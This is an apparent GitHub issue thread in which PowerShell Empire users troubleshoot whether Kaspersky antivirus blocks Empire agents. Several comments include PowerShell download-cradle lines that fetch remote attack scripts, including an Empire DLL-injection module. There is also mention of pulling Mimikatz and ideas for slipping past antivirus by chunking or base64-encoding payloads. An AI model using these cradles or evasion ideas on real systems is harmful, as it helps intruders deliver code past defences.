### ISSUE TITLE
AV blocking empire agents

### ISSUE THREAD

**Issue by Jack64** [PowerShellEmpire/Empire#64]
Hey there,

I've been experimenting a bit with Empire and in my testing I was trying to run it with Kaspersky Internet Security 2016 enabled.
Apparently KIS 2016 is limiting the size of the scripts downloaded by System.Net.WebClient to 14409 bytes (as far as I could tell by manual testing), so if I deactivate it, everything goes smoothly but if I enable it, I get:
```    ----------------------------------------
    Exception happened during processing of request from ('192.168.1.94', 49762)
    Traceback (most recent call last):
      File "/usr/lib/python2.7/SocketServer.py", line 295, in _handle_request_noblock
        self.process_request(request, client_address)
      File "/usr/lib/python2.7/SocketServer.py", line 321, in process_request
        self.finish_request(request, client_address)
      File "/usr/lib/python2.7/SocketServer.py", line 334, in finish_request
        self.RequestHandlerClass(request, client_address, self)
      File "/usr/lib/python2.7/SocketServer.py", line 657, in __init__
        self.finish()
      File "/usr/lib/python2.7/SocketServer.py", line 716, in finish
        self.wfile.close()
      File "/usr/lib/python2.7/socket.py", line 279, in close
        self.flush()
      File "/usr/lib/python2.7/socket.py", line 303, in flush
        self._sock.sendall(view[write_offset:write_offset+buffer_size])
    
    error: [Errno 32] Broken pipe
    ----------------------------------------
```
on the empire C&C side and on the cmd.exe running the agent (e.g. launcher.bat), I get a hung console.

From my testing, doing:
```
$wc = New-Object System.Net.WebClient;
$wc.downloadstring("http://arandomhost.com/mycode.ps1");
```
works as long as the script is under 14409 bytes. If it's larger than 14409 bytes OR you replace HTTP with HTTPS on the downloadstring URL, you get
```
Exception calling "DownloadString" with "1" argument(s): "The underlying connec
tion was closed: An unexpected error occurred on a send."
At line:1 char:19
+ $wc.downloadstring <<<< ("https://arandomhost.com/mycode.ps1");
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : DotNetMethodException
```
It's also noteworthy that KIS throws NO alerts when blocking powershell downloads and as far as I could tell, there are no KIS threat log entries related to these events.
I'm not sure how to fix this, because powershell is listed as a "Trusted" application by KIS.
If KIS is blocking all HTTPS traffic by powershell (yes, even when injected into another process via PSInject) and due to Empire's whole HTTPS foundation, it's going to be tricky to bypass.
P.S. - Doing `$wc.downloadstring()` to servers with valid SSL certificates (i.e. Github) also fails with the same error.

**Comment by enigma0x3** [comment]
@Jack64,
That is really interesting. I have never heard of a product blocking download cradles over a certain size. We will take a look at this and get back to you.

Thanks for reporting!

**Comment by Jack64** [comment]
@enigma0x3 ,
Thanks for getting back to me so quickly ! This could use further testing, I haven't tried breaking up a big file into 10kb chunks and loop through the download and then put it back together but it should work. I have tried base64 encoding my test.ps1 file (encodes to 10021 bytes) and it downloaded properly, so in theory base64 encoding a big file and chopping it up for download should also work.
If this turns out to be the case, I wonder if it's feasible to do a "bypass AV network protection" function that chops up big comms in 10kb chunks and just loops the downloadstring function till EOF.

**Comment by LogoiLab** [comment]
a slight workaround would be to split you script into several small files, download them all and splice them together again.(for the time being)

**Comment by davehardy20** [comment]
I just got a trial version of KIS 2016 and installed onto my test windoze box, tried to download, invoke-mimikatz(677.3kb), via the download cradle.
It downloaded just fine.
I then setup Empire and got an agent via the normal launcher, and then replicated the download of mimikatz via the shell command and all was well.
So the outcome of this is somewhat confusing going on Jack64's issues.

**Comment by Jack64** [comment]
Hey there @davehardy20 , thanks for going to the trouble of testing this. I was hoping someone would do that. So you have KIS 2016 fully enabled and you can use the launcher stager without any problems?
That's weird.
Could you just run this test please?
```
$wc = New-Object System.Net.WebClient;
$wc.downloadstring("https://raw.githubusercontent.com/PowerShellEmpire/Empire/master/data/module_source/code_execution/Invoke-DllInjection.ps1");
```
if this doesn't fail with KIS enabled, then there's something wrong with my setup.

**Comment by davehardy20** [comment]
Yeah this worked directly inside a Powershell ISE session, also worked
inside an Empire agent.

Dave

On 16 October 2015 at 15:18, João Pena Gil <notifications@github.com> wrote:

> Hey there @davehardy20 <https://github.com/davehardy20> , thanks for
> going to the trouble of testing this. I was hoping someone would do that.
> So you have KIS 2016 fully enabled and you can use the launcher stager
> without any problems?
> That's weird.
> Could you just run this test please?
>
> $wc = New-Object System.Net.WebClient;
> $wc.downloadstring("https://raw.githubusercontent.com/PowerShellEmpire/Empire/master/data/module_source/code_execution/Invoke-DllInjection.ps1");
>
> if this doesn't fail with KIS enabled, then there's something wrong with
> my setup.
>
> —
> Reply to this email directly or view it on GitHub
> <https://github.com/PowerShellEmpire/Empire/issues/64#issuecomment-148729878>
> .
>



-- 
Best Regards
David Hardy

Follow Me on Twitter @davehardy20 <http://twitter.com/davehardy20> LinkedIn
Profile <http://uk.linkedin.com/pub/david-hardy/6/388/2a2> pentest-N00b Blog
<http://pentestn00b.wordpress.com/>

**Comment by Jack64** [comment]
What the hell ? This could be some misconfiguration on my VM but I can't explain why it works with KIS protection disabled and won't work with KIS protection enabled ...

**Comment by enigma0x3** [comment]
I'll download KIS 2016 and test as well just to verify.

**Comment by enigma0x3** [comment]
Ok, I'm running KIS 16.0.0.614 (a) and all download cradles work for me.

**Comment by Jack64** [comment]
So I guess this issue is due to some misconfiguration on my part. I'll be closing this then and try to figure out what the hell is going on in this VM.

**Comment by enigma0x3** [comment]
Let me know what configuration you determined caused that. Looking at the default configuration, powershell is a trusted digitally signed application, so I don't think it is looking at it.

**Comment by Jack64** [comment]
It must be something network related. It's weird because disabling KIS fixes the issues, that's why I thought it was KIS that was doing the blocking but then it's weird because it throws 0 alerts. Windows oddities I suppose..

**Comment by enigma0x3** [comment]
heh, that is Windows for you :P
